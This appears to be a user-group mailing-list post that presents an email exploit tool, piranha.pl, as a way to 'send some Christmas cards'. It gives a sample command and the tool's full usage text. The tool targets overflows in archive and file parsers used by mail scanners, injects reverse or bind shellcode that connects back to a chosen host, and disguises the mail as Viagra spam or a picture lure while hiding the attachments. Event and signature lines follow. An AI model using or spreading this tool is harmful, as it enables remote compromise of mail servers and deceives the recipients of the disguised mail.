Send some Christmas cards:
$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a myname@mydomain.com
Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing
Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachments from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode
Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS
Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell
Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"
Vanishing techniques for attachments:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 <img src="image.JPG" width=0 height=0> trick
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant.
http://uncyclopedia.wikia.com/wiki/Satan_Claus
Send e-mail anywhere. No map, no compass. Get your HotmailŪ account now.